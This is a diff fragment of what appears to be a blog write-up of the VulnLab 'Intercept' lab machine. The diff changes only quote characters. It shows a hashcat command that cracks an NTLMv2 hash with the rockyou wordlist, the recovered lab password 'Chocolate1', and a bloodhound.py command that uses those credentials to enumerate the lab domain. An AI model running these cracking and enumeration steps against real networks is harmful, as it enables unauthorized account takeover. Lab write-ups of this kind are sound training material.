V0nzy/v0nzy.github.io/_posts/2024-02-19-VL-Intercept.md

 ```bash
 hashcat -a 0 -m 5600 hash.txt /opt/rockyou.txt
 ```
-This successfully recovered the password which ended up being “Chocolate1”.
+This successfully recovered the password which ended up being "Chocolate1".
 ![_install](/assets/img/VL-Intercept/cracked_hash.png)

 ## Domain Enumeration
 Now that we have a valid Domain account we can enumerate the domain using bloodhound.
-Let’s run the python remote ingester to collect some data:
+Let's run the python remote ingester to collect some data:

 ```bash
 bloodhound.py -d intercept.vl -v --zip -c All -dc DC01.intercept.vl -ns 10.10.185.69 -u 'Kathryn.spencer' -p 'Chocolate1' --dns-timeout 10